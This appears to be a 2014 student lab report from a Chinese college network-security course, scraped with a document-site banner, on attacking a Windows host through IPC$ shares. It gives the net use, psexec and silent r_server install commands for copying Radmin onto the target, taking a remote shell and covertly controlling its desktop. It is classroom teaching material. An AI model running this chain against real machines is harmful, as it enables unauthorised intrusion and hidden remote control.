- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
網络安全技术实验八_ip管道利用
沈 阳 工 程 学 院
学 生 实 验 报 告
实验室名称:信息学院网络安全实验室
实验课程名称:网络安全技术
实验项目名称:实验五 IPC$管道的利用与远程控制
班 级: 姓 名: 学 号:
实验日期: 2014 年 4 月 16 日 实验台编号:17
指导教师:
批阅教师(签字): 成绩:
实验目的
实验内容
上传恶意程序;
远程控制;
删除默认共享。
实验原理
IPC$ (Internet Process Connection) IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。
net use \\远程主机IP “密码” /user: “用户名” 与远程主机建立IPC$连接通道
net use z: \\远程主机ip\c$ 将远程主机的C盘影射为本地Z盘
copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\\a.txt到远程主机
net use \\远程主机ip /del 删除与远程主机的IPC$连接
实验软硬件环境
(WindowsXP)、Windows实验台
网络环境拓扑如下图所示。
如图 网络环境拓扑图
实验目标需首先确定所在实验台IP地址,并根据实验步骤填写正确的IP地址进行实验。
实验步骤
IPC$默认共享
启动实验台,以实验台为被攻击机即目标主机。主机IP如图1所示。
图1 目的主机IP地址
利用IPC$漏洞实施攻击,首先要保证被攻击机的IPC$默认共享已经打开。在Win2003操作系统中admin$,IPC$,C$默认打开,而在WinXP中根据不同版本有所不同。可用net share命令查看,如图2所示。
图2 查看共享文件
如果没有打开,可以在主机上运行命令开启,如图3所示。
图3 添加删除共享
利用以下命令与远程主机建立IPC连接
net use \\远程主机ip “密码” /user: “用户名” 与目标主机建立IPC$连接通道
net use z: \\远程主机IP\c$ 将目标主机的C盘影射为本地Z盘
copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\a.txt到目标主机
net use \\远程主机ip /del 删除与目标主机的IPC$连接
具体如图4、图5所示。
图4
图5
将对方的C盘映射为本地的Z盘,则可以像操纵本地硬盘一样对目标主机C盘进行操作。如图6所示。
图6 映射共享文件夹
攻击实施
现在的目标就是在对方不知道的情况下安装并运行软件。
实验工具箱中取得实验工具radmin,将其中的r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。
利用psexec工具获得对方的Shell,命令如下:
psexec \\远程主机ip –u 用户名 –p 密码 cmd.exe;
这里的-u和-p参数分别指定远程主机的用户名和密码,cmd.exe是远程主机的命令行程序。执行成功之后就获取到了目标主机的Shell,通过下图可以看到ipconfig命令已经在远程主机上执行了,获得的是对方主机的IP地址172.20.3.17。如图7所示。
图7 查看远程IP配置
在得到的远程主机Shell上安装r_server,命令如下:
C:\r_server /install /pass:密码 /port:端口 /silence。
其中密码可指定为123,此实验中没有用到。通过/port参数指定端口号,默认是4899。/silence参数表示静默安装,否则会在目标主机上出现安装的窗口,这是攻击者不希望看到的,如图8所示。
图8 安装r_server
启动r_server服务
net start r_server (注:如提示服务名称无效,则需运行两次或多次),如图9所示。
图9 启动r_server
攻击者在本地运行Radmin的客户端radmin.exe,从菜单栏选择 连接选项-连接到…,输入目标主机的IP地址和安装r_server时指定的端口号点击确定,建立一个到目标主机的连接,如图10、图11所示。
图10
图11
连接建立成功之后就可以看到目标主机的桌面,并能控制目标主机,如图12所示。可在客户端软件中选择连接模式,其中完全连接权限最
文档评论(0)